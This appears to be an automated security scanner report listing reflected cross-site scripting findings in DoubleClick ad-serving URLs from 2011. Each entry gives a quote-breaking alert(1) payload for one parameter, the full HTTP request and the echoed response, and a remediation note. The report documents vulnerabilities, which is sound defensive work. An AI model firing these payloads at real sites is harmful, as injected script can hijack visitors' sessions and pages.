The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0271'-alert(1)-'62af3c29b54 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1b0271'-alert(1)-'62af3c29b54&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:21 GMT Expires: Sat, 29 Jan 2011 05:20:21 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... d.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1b0271'-alert(1)-'62af3c29b54&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cc5"-alert(1)-"e78fc2ba4dd was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1c1cc5"-alert(1)-"e78fc2ba4dd&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:21 GMT Expires: Sat, 29 Jan 2011 05:20:21 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... d.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1c1cc5"-alert(1)-"e78fc2ba4dd&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFou ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b608"-alert(1)-"043dce3e05a was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=5222361b608"-alert(1)-"043dce3e05a&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:18 GMT Expires: Sat, 29 Jan 2011 05:20:18 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=5222361b608"-alert(1)-"043dce3e05a&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTa ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0165'-alert(1)-'634ccbdbc03 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236f0165'-alert(1)-'634ccbdbc03&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:19 GMT Expires: Sat, 29 Jan 2011 05:20:19 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236f0165'-alert(1)-'634ccbdbc03&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97bd1'-alert(1)-'cb3c0dc5ffc was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=5439397bd1'-alert(1)-'cb3c0dc5ffc&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:23 GMT Expires: Sat, 29 Jan 2011 05:20:23 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=5439397bd1'-alert(1)-'cb3c0dc5ffc&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a2e1"-alert(1)-"448534e683b was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=543933a2e1"-alert(1)-"448534e683b&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:22 GMT Expires: Sat, 29 Jan 2011 05:20:22 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=543933a2e1"-alert(1)-"448534e683b&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 373ba'-alert(1)-'f120bbbe02 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903373ba'-alert(1)-'f120bbbe02&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5990 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:15 GMT Expires: Sat, 29 Jan 2011 05:20:15 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7d/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903373ba'-alert(1)-'f120bbbe02&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a04f3"-alert(1)-"51bafdadbda was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903a04f3"-alert(1)-"51bafdadbda&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:15 GMT Expires: Sat, 29 Jan 2011 05:20:15 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... scape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903a04f3"-alert(1)-"51bafdadbda&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fs ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a25ce'-alert(1)-'cddf5d2d430 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5a25ce'-alert(1)-'cddf5d2d430&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:27 GMT Expires: Sat, 29 Jan 2011 05:20:27 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5a25ce'-alert(1)-'cddf5d2d430&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0ff"-alert(1)-"7e478181650 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5ac0ff"-alert(1)-"7e478181650&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:26 GMT Expires: Sat, 29 Jan 2011 05:20:26 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... lick%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5ac0ff"-alert(1)-"7e478181650&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false; var wm ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ab0'-alert(1)-'b3d4566e284 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0d3ab0'-alert(1)-'b3d4566e284&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:20 GMT Expires: Sat, 29 Jan 2011 05:20:20 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0d3ab0'-alert(1)-'b3d4566e284&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\"> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4f66"-alert(1)-"c200b6efce1 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0c4f66"-alert(1)-"c200b6efce1&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:19 GMT Expires: Sat, 29 Jan 2011 05:20:19 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0c4f66"-alert(1)-"c200b6efce1&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d52e'-alert(1)-'5e41e6817f1 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=4d52e'-alert(1)-'5e41e6817f1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5797 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:23 GMT Expires: Sat, 29 Jan 2011 05:20:23 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=4d52e'-alert(1)-'5e41e6817f1http://www.dawnrecetas.com\"> ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe2fe"-alert(1)-"e1eaa27e27d was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=fe2fe"-alert(1)-"e1eaa27e27d HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5797 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:22 GMT Expires: Sat, 29 Jan 2011 05:20:22 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=fe2fe"-alert(1)-"e1eaa27e27dhttp://www.dawnrecetas.com"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bd16'-alert(1)-'d5fd3def361 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=61bd16'-alert(1)-'d5fd3def361&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:15 GMT Expires: Sat, 29 Jan 2011 05:20:15 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=61bd16'-alert(1)-'d5fd3def361&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\"> ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c29"-alert(1)-"d32825b59b7 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6a9c29"-alert(1)-"d32825b59b7&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:14 GMT Expires: Sat, 29 Jan 2011 05:20:14 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6a9c29"-alert(1)-"d32825b59b7&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
